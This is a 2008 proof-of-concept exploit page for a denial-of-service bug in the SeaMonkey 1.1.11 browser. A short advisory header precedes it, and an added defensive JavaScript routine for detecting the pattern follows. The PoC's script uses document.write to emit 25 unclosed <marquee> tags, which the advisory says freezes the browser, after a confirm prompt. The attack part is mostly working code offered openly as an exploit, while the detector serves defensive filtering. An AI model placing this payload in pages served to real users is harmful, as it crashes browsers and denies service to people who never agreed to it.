07 September, 2008

SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

<!--

Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.

Product web page: http://www.seamonkey-project.org/

Desc: SeaMonkey suffers from a remote denial of service (DoS)
vulnerability triggered by a specially crafted HTML file that
uses the <marquee> tag multiple times (>24). Successful
exploitation allows remote attackers to cause the application
to freeze, denying service to legitimate users.

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

08.09.2008

-->

<html>
<head>
<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>
</head>
<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />
<center>
<script type="text/javascript">
document.write("<kbd>Wooow Camel..!! WOW!</kbd>");

// Writes 25 opening <marquee> tags, none of them closed.
function t00t()
{
    for (var i = 0; i < 25; i++)
    {
        document.write("<marquee>");
    }
}

alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");

// Ask before running the PoC; Cancel navigates away instead.
var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (b0x == true)
{
    t00t();
}
else
{
    alert("Allrighty Then!");
    window.location.href = "http://www.disneyland.com";
}
</script>
</center>
</body>
</html>

http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070

Test: http://www.zeroscience.org/codes/seamonkey_dos.html
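
Added example, not part of the original advisory or of SeaMonkey: a defensive check that a crawler or content filter could run over markup, including markup collected from an emulated document.write(), to flag the pattern the description names (more than 24 open <marquee> elements). All function and constant names are hypothetical, and reading "multiple times" as nesting depth of unclosed tags is an assumption taken from the PoC loop.

```javascript
// Added example; names are hypothetical, not from the advisory.
// Threshold taken from the advisory text: more than 24 <marquee> tags.
const MARQUEE_LIMIT = 24;

// Deepest run of open, unclosed <marquee> elements in a markup string.
// Assumption: "multiple times" means nested (unclosed) tags, as in the PoC loop.
function maxMarqueeDepth(markup) {
  // Ignore tags that only appear inside HTML comments.
  const visible = String(markup).replace(/<!--[\s\S]*?-->/g, "");
  const tagRe = /<(\/?)marquee\b[^>]*>/gi;
  let depth = 0;
  let max = 0;
  let m;
  while ((m = tagRe.exec(visible)) !== null) {
    if (m[1] === "/") {
      depth = Math.max(0, depth - 1); // stray closing tags never go negative
    } else {
      depth += 1;
      max = Math.max(max, depth);
    }
  }
  return max;
}

// Monitor for a crawler or sandbox that emulates document.write():
// accumulates written chunks and reports when the limit is exceeded.
function makeWriteMonitor(limit = MARQUEE_LIMIT) {
  let buffer = "";
  return {
    write(chunk) {
      buffer += String(chunk);
      return maxMarqueeDepth(buffer) <= limit; // false => flag the page
    },
    depth() {
      return maxMarqueeDepth(buffer);
    },
  };
}

// Constructed sample: replay the writes a script would make, stop on first flag.
function firstFlaggedWrite(chunks, limit = MARQUEE_LIMIT) {
  const monitor = makeWriteMonitor(limit);
  for (let i = 0; i < chunks.length; i++) {
    if (!monitor.write(chunks[i])) return i + 1; // 1-based write number
  }
  return 0; // never exceeded the limit
}
```

Because the monitor re-scans the accumulated buffer, a tag split across two writes is still counted once it is complete.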
